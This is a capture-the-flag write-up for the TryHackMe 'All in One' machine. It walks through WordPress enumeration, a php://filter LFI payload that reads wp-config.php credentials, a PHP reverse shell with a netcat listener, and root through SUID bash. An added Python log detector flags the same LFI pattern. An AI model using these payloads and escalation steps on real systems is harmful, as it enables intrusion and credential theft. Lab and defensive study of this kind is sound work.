TryHackMe: ALL IN 1 Write-up

ENUMERATION

Meraki_Sec
Jan 13, 2021

SCANNING

Let's begin with a basic nmap scan:

nmap -A -T4 -p- <ip> -oN scan.nmap

NMAP scan.

FTP (PORT 21)

From the scan we now know that three ports are open. FTP allows anonymous login, so let's see if we can find anything interesting.

You can use the following command to log in to FTP:

ftp <ip>

It looks like there is nothing of interest on the FTP server.

PORT 80

Apache2 Default page.

Port 80 serves the default Apache2 page.

Let's check whether there are any hidden directories.

You can use any tool you like; here we are using gobuster.

command:

gobuster dir -u <url> -w <wordlists>

gobuster report

So now we know that WordPress is running.

source page

Enumerating the WordPress site, we find a user named elyana.

Let's try brute-forcing the login.

brute force wp-login

Hmm, don't waste much time on brute force, because there is no guarantee you will ever hit the right password.

Let's try running WPScan and see if it finds anything interesting:

WPScan report

Oh, there is a mail-masta plugin, version 1.0, which is vulnerable.

EXPLOITATION

Looking up exploits for the plugin, we learn that it is vulnerable to Local File Inclusion (LFI).

using PHP wrapper

Let's try to retrieve the WordPress config file.

You can use the php://filter wrapper, which returns the file base64-encoded instead of executing it as PHP:

/example1.php?page=php://filter/convert.base64-encode/resource=../../../../../wp-config.php

Once you have the encoded source, decode it with base64:

base64 -d <file>
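From the defender's side, the same request pattern is easy to spot in the web server logs. The following is an added example, not part of the original write-up: a small Python detector that flags PHP stream wrappers, traversal sequences and sensitive file names in Apache combined-format access log lines, decoding URL encoding first so encoded variants do not slip past. The log lines are constructed, and the /example1.php?page= path mirrors the placeholder form used above; real plugin paths vary.

```python
import re
from urllib.parse import unquote

# Constructed sample Apache access log lines (combined format); the
# /example1.php?page= form mirrors the placeholder used in this write-up.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Jan/2021:10:01:02 +0000] "GET /wp-login.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
10.0.0.9 - - [13/Jan/2021:10:01:10 +0000] "GET /example1.php?page=php://filter/convert.base64-encode/resource=../../../../../wp-config.php HTTP/1.1" 200 5120 "-" "curl/7.68.0"
10.0.0.9 - - [13/Jan/2021:10:01:15 +0000] "GET /example1.php?page=php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3D..%2F..%2F..%2Fwp-config.php HTTP/1.1" 200 5120 "-" "curl/7.68.0"
10.0.0.5 - - [13/Jan/2021:10:02:00 +0000] "GET /?p=1 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Extract the client IP and request path from a combined-log-format line.
_REQ_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<path>\S+) [^"]*"')

# Indicators of the technique shown above: a PHP stream wrapper passed to an
# include parameter, traversal out of the web root, and sensitive file names.
_CHECKS = (
    ("php-wrapper", re.compile(r'(?:php|data|expect|phar|zip)://', re.IGNORECASE)),
    ("traversal", re.compile(r'(?:\.\./|\.\.\\){2,}')),
    ("sensitive-file", re.compile(r'wp-config\.php|/etc/passwd', re.IGNORECASE)),
)


def normalize(path: str) -> str:
    """URL-decode repeatedly (up to 3 rounds) so %2e%2e%2f and double encoding don't evade the match."""
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def classify(line: str):
    """Return (ip, decoded_path, reasons) for a suspicious line, or None for a benign or unparseable one."""
    m = _REQ_RE.match(line)
    if not m:
        return None
    path = normalize(m.group("path"))
    reasons = [name for name, rx in _CHECKS if rx.search(path)]
    return (m.group("ip"), path, reasons) if reasons else None


def scan(log_text: str):
    """Return every suspicious hit, in log order."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for ip, path, reasons in scan(SAMPLE_LOG):
        print(f"{ip} {','.join(reasons)} {path}")
```

Both LFI lines are reported with all three reasons, including the URL-encoded one, while the two ordinary WordPress requests are left alone.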

wp-config.php source.

Since we now have a password, we can log in to WordPress.

Let's get a reverse shell by uploading arbitrary PHP code.

Arbitrary code upload

Now set up a listener with netcat:

nc -nvlp <port>

How do we reach the 404.php file where we placed the code?

Change the permalink settings to Plain if the site is using any custom structure.

permalink settings.

You can now trigger the file by visiting the following URL:

http://server/?p=404.php

reverse shell.

PRIVILEGE ESCALATION

Let's check whether there is any way to escalate privileges as www-data.

After looking around for a while, we find that SUID permissions can be used to escalate privileges.

We can use find to list files with the SUID bit set:

find / -perm -u=s -type f 2>/dev/null

find command results.

bash has the SUID bit set, so running it with -p (which keeps the elevated effective UID instead of dropping it) escalates privileges:

/bin/bash -p

BoOM!!

We now belong to the root group.
